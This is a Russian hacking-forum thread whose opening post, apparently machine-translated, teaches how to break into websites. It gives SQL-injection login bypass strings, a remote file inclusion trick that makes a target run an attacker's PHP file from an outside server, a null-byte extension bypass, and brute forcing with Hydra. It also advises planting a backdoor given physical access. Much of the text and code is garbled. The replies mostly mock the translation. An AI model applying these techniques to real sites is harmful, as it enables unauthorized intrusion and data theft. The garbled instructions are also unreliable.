Бесплатно Как взломать сайт

Тема в разделе "Уязвимости и взлом", создана пользователем A'LonE, 3 фев 2018.

  1. A'LonE

    A'LonE

    Сообщения:
    44
    Баллы:
    6
    Здравствуйте меня зовут A'LonE, Мы все знаем, что взлом - это не что иное, как мастерство этого века.
    Так что это значит? '

    https://i.mycdn.me/image?id=859268502305&t=3&plc=MOBILE&tkn=*eiTSJK_nNg7VOnnr91okPwzxrHo

    Это означает, что не каждый может получить это умение. так что вы можете видеть, как привилегированно знать хакерство, в других руках это просто спорт, некоторые рождаются с талантом, некоторые из них должны много практиковать, чтобы получить необходимые навыки.

    Зачем взламывать сайт? Мы не белые?
    Даже если у вас никогда не было удачного взлома, прежде чем я предположил, что, как только вы здесь, вы уже знаете, в чем смысл картинки выше (картина выглядит немного страшной и более похожей на отношение черной шляпы), классификация хакеров на самом деле не имеют большого смысла, на мой взгляд, есть новички, хакеры, экспертные хакеры и даже хуже, чем полосы, даже как белая шляпа (в соответствии с тем, что мир определяет как белую шляпу), иногда вы окажетесь в ситуациях где вы должны принести а * отверстие вниз, потому что они работают не - человеческие сайты, как детская порнография и т.д.

    ОК! Итак, как взломать сайт?
    Здесь есть множество учебников по нуль-байту и по всему Интернету о том, как взломать веб-сайт с помощью специального инструмента, если вы хотите узнать, что вы в нужном месте, просто осмотритесь, но сегодня я хочу поделиться что-то, что я думаю, что это будет очень полезно для вас, возьмите чашку кофе, возьмите свой стул и начните читать это, то, что я собираюсь показать вам сегодня, полностью отличается от моих других уроков, вместо того, чтобы показывать вам, как использовать эти инструменты , я расскажу вам, как вы можете успешно использовать эти инструменты и приемы для взлома любого веб-сайта, основываясь на моем опыте.

    Ниже мой список, когда я хочу взломать веб-сайт

    Разведка
    Причина, по которой многие новички и непрофессиональные хакеры не могут добиться успешного взлома, - это то, что они не хотят ждать, большую часть времени им нужна волшебная кнопка, где они могут щелкнуть, и это все, но в реальности это не так, первое, что вам нужно сделать, это хорошая разведка о вашей цели, поскольку знакомые с разработкой программного обеспечения легче понять, что я имею в виду, вы не можете разработать хорошее программное обеспечение без хорошей документации, просто как и UML в индустрии программного обеспечения, здесь одно и то же, нам нужна информация о цели, облегчающей наши задачи.

    Какие услуги они запускают?
    Подумайте о таких продуктах, как открытые порты, программное обеспечение и версии на сервере, и попытайтесь найти эксплойт в случае, если есть хотя бы один онлайн, или вы можете просто сделать свой собственный эксплойт.

    Инструменты, которые я рекомендую для этого раздела, это nmap, whatweb и nikto и, конечно же, некоторые другие, сделанны A’Lone или вами.


    Они сами писали сценарий?
    В случае, если они сами написали это, найдите сценарии, которые принимают пользовательский ввод, сканируют список каталогов, проверяют исходный код, определяют, как веб-сайт реагирует на ненормальные входы, я часто использую эти входы:

    ADMIN 'OR 1 = 1 #, когда его URL-адрес администратора как веб-сайт / admin / loign /

    когда его обычный логин просто попробуйте те традиционные инсталляторы sql, как
    «OR» 1 '=' 1 '-
    ' OR '1' = '1' ({
    'OR' 1 '=' 1 '/ *

    Но это не заканчивается здесь, попробуйте написать sql-инструкции на входах, повторите эхо, попробуйте выполнить команду на основе ОС сервера, выяснить, как веб-сайт фильтрует входные данные и пытается обойти фильтры.

    И в случае, если они использовали чужой код, такой как CMS, просто возьмите его копию и попытайтесь найти ошибки самостоятельно или найдите эксплойт, если они используют пригодную для использования версию CMS.

    Злой Google
    Иногда я взламываю веб-сайты просто с помощью некоторых обработанных поисковых запросов Google, поскольку хакеру вы должны знать, как использовать Google для сбора информации или взлома,


    Изменение исходного кода
    Бьюсь об заклад, на этом этапе вы уже знаете, как увидеть исходный код веб-страницы, используя трюк правой кнопки мыши, просто чтобы запомнить, что языки сценариев, такие как php, perl, asp, python и т. Д., Запускаются на стороне сервера, поэтому означает, что вы не можете увидеть, щелкнув правой кнопкой мыши, за исключением платформы с открытым исходным кодом, где вы можете получить ее копию и изменить весь код.

    Список каталогов
    Просмотр индексов может быть очень полезен при попытке найти файлы, которые вы обычно не должны видеть, как файлы паролей, файлы, используемые для администрирования веб-страницы, файлы журналов, любые файлы, в которых информация хранится.

    вы также можете вручную проверить наличие подозрительных URL-адресов:
    website.com/logs/
    website.com/files/
    website.com/sql/
    website.com/secret/
    вы можете либо сделать инструменты, которые автоматически сделают это для вас, например инструменты dirbsuter может быть очень полезен для этой задачи.

    Мой друг robots.txt
    Очень важно, что, взломав взглянуть на эти файлы, я не буду объяснять использование robots.txt (просто Google), они часто приводят нас к большому пути, где они не хотят видеть роботов, а иногда они очень чувствительные пути.

    Включение удаленных файлов
    Уязвимость включения файлов - это тип уязвимости, которая чаще всего встречается на веб-сайтах. Он позволяет злоумышленнику включать файл, обычно через скрипт на веб-сервере. Уязвимость возникает из-за использования вводимого пользователем ввода без надлежащей проверки. Ниже у нас есть фрагмент кода php, который открывает файл.

    Код:
    <? php
    if (! ($ hfile = fopen ("$ file", "r"))
    echo ("Ошибка: файл не может быть открыт. $ file <br /> \ n");
    ?>
    В этом примере откройте файл с имя, указанное в пользовательском вводе ($ file).
    Это означает, что он открывает все файлы, которые злоумышленник хочет открыть, и если разрешить url fopen включен даже удаленные файлы.
    Посмотрите пример на этот фрагмент кода:
    Пример:

    Код:
    <? php
    include ($ dir. "/members.php");
    ?>
    Просто создайте файл .members.php на своем веб-сервере и вызовите скрипт следующим образом:
    dir = http://www.server.com/

    Он выполнит ваш файл на целевом сервере. Важно то, что у вас есть PHP, или код будет выполнен на вашем сервере.


    NullBytes
    Допустим, у них есть скрипт, который принимает имя файла, которое он получает, и помещает «.txt» в конец. Поэтому программист пытается убедиться, что только файлы txt могут быть открыты.

    Но как насчет имени файла следующим образом:

    phppage.php% 00
    Он достигнет:
    phppage.php% 00.txt


    Итак, fopen открывает phppage.php% 00.txt или? Нет! И в этом суть. Функции fopen останавливаются после
    «.php» перед байтом NULL и открываются только «phppage.php». Таким образом, каждый тип файла может быть открыт.
    Скрипты, разрешающие загрузку (но только для определенного типа файла), также являются потенциальной мишенью для этого типа атаки.

    SQL-инъекция
    SQL-инъекция - это метод ввода кода, используемый для атаки приложений, управляемых данными, в которых вредоносные SQL-инструкции вставляются в поле ввода для выполнения, в моем личном опыте это самая популярная проблема, которую вы найдете на веб-сайтах, проблема в том, что некоторые веб-сайты помещают эту информацию в базу данных, а не все ее фильтруют.


    Поэтому, когда вы повторите эхо, появится javascript-сообщение.
    Если они только вошли в журнал, последняя часть должна вызвать ошибку sql, которая может дать нам много полезной информации.
    Вы можете попробовать следующий website.com/users.php?id=1
    и добавить / '/ website.com/users.php?id=1',
    если он выбрасывает бинго-ошибку, вы там.


    Функциональные функции PHP
    Исполнение кода:


    require () - считывает файл и интерпретирует контент как PHP-код
    include () - читает файл и интерпретирует контент как PHP-код
    eval () - интерпретирует строку как PHP-код
    preg replace () - если он использует модификатор / e он интерпретирует заменяющую строку как PHP-код


    Исполнение команды:
    exec () - выполняет команду + возвращает последнюю строку своего вывода
    passthru () - выполняет команду + возвращает свой вывод в удаленный браузер
    (backticks) - выполняет команду и возвращает результат в массиве
    shellexec - выполняет команду + возвращает вывод как string
    system () - выполняет команду + возвращает свой вывод (почти такой же, как passthru ()).
    can't обрабатывает двоичные данные
    popen () - выполняет команду + связывает свой выходной или входной поток с файловым дескриптором PHP

    Раскрытие файла:
    fopen () - открывает файл и связывает его с файловым файлом дескриптора файла
    readfile () - считывает файл и записывает его содержимое непосредственно в
    файл удаленного браузера () - считывает весь файл в
    файл массива get contents () - считывает файл в строку

    Жестокое принуждение
    Иногда вы будете использовать все описанные выше методы, но некоторые веб-сайты действительно безопасны, и нет простого способа их использования.


    Часто это не мешает нам взломать их, у них могут быть открытые порты, на которых запущены некоторые службы, такие как ftp, telnet и т. Д., Попытайтесь переустановить его и получить пароль, Hydra - еще один замечательный инструмент для таких задач.

    Физический доступ
    Если у вас есть физический доступ к серверу, вы получаете все в своих руках, будьте дискретными и оставляете на нем бэкдор, и вы это сделали.

    Я просто поделился тем, что у меня теперь на голове, вы также можете добавить свои комментарии в разделы ответов...

    Спасибо за внимание и извините за длинные текст.

    Команда https://www.armhack-team.ru

    Если вам нравилось то пожалуйста дайте репутацию, это вам не сложно а мне приятно

    P.S.
    Простите за орфографические ошибки
  2. tigeor

    tigeor

    Сообщения:
    191
    Баллы:
    16
    Бля на хуй ты выложил. Щас кто нить форум ломанет и все))))
  3. LOOOOL

    LOOOOL

    Сообщения:
    107
    Баллы:
    16
    Это те вещи, которые понимать обязательно))
  4. MyZik

    MyZik

    Сообщения:
    192
    Баллы:
    16
    "Армянская команда кибербезопасности", спасибо, что на страже моего сна!

    Ну а по теме, вполне годно, только странно, что не начал с XSS.

    // P.S. У вас на сайте кривой русский язык, нужно поправить.
  5. Ага оно да

    Ага оно да

    Сообщения:
    93
    Баллы:
    6
    мне одному кажется что это перевод гугла или промта?
    прикольная команда - файл массива.... хоть бы смотрел что у тебя перевелось. если такими командами сможешь взломать чтото с меня шоколадка
  6. SmieleME

    SmieleME

    Сообщения:
    17
    Баллы:
    3
    Тоже так подумал )
  7. Ага оно да

    Ага оно да

    Сообщения:
    93
    Баллы:
    6
    Вот в который раз возникает вопрос. Вы свои какульки выкакиваете когда вы головой подумайте. Ты либо после переводчика сам по тексту пробегись либо копиру сдай. это недорого. а тут если для тебя все так и тебя не смущают команды наполовину на русском наполовину на английском то в теме данной ты меньше чем НОЛЬ. следственно набиваешь себе цену и репу. а если точнее в глаза ссыш пользователям форума. Ну если это не твое так и напиши перевел переводчиком.
    Вот и хер то в чем. А у него все так.
  8. SmieleME

    SmieleME

    Сообщения:
    17
    Баллы:
    3
    Такое чувство что только ето его слова:
    A'LonE сказал(а): goto/post?id=136203#post-136203
    Здравствуйте меня зовут A'LonE,
    +кто с большой пишет после "," ?​
  9. Ага оно да

    Ага оно да

    Сообщения:
    93
    Баллы:
    6
    АХАХАХА я ору. Взлом с физическим доступом. Вот это действительно взлом по армянски. Если у вас есть физический доступ к серверу то для взлома сайта из инструментов достаточно лома. При этом за секунду в щепки можно взломать 2-3 десятка сайтов.
    И лайвхак от меня. держите лом в резиновых перчатках.
  10. SmieleME

    SmieleME

    Сообщения:
    17
    Баллы:
    3
    Куплю эту схему
  11. Ага оно да

    Ага оно да

    Сообщения:
    93
    Баллы:
    6
    Бро без обид я пока сам по ней работаю. Позже как в паблик солью отстучу в личку.
  12. SmieleME

    SmieleME

    Сообщения:
    17
    Баллы:
    3
    Окей, буду ждать, с первых строк понял что приват схема.
  13. Ага оно да

    Ага оно да

    Сообщения:
    93
    Баллы:
    6
    Я вообще фуфло не втюхиваю. Тему сливать буду со всем необходимым. ломы и все остальное что не обходимо на ядиск не возьмут я короче в постомате наверное оставлю. если лом сильно не оплавится. Просто у меня еще несколько заказов на взлом.
  14. SmieleME

    SmieleME

    Сообщения:
    17
    Баллы:
    3
    Мануал по получению лома будет?
  15. Ага оно да

    Ага оно да

    Сообщения:
    93
    Баллы:
    6
    неожиданно для себя нашел в этой теме ответ на многие вопросы. список тем с вопросами на скрине. особенно эффектно получится с темой по центру. Там даже перчатки резиновые не нужны. Даже если конкурента замкнет. [​IMG]
  16. Ага оно да

    Ага оно да

    Сообщения:
    93
    Баллы:
    6
    там на целый квест мануал. но предлагаю флудить завязывать пока не отшлепали.
  17. Haltura

    Haltura

    Сообщения:
    146
    Баллы:
    16
    Эх братья армяне, коньячок подогнали бы под утро на хорошее настроение) Ведь лучше него что есть у вас)
  18. Lobadzip

    Lobadzip

    Сообщения:
    197
    Баллы:
    16
    я уже хочу плакать(((
  19. Shram

    Shram

    Сообщения:
    8
    Баллы:
    1
    Кровью?
  20. danaforevr

    danaforevr

    Сообщения:
    112
    Баллы:
    16
    Годно!
    Попроси у АМС приставку "Авторская статья"

Поделиться этой страницей

Top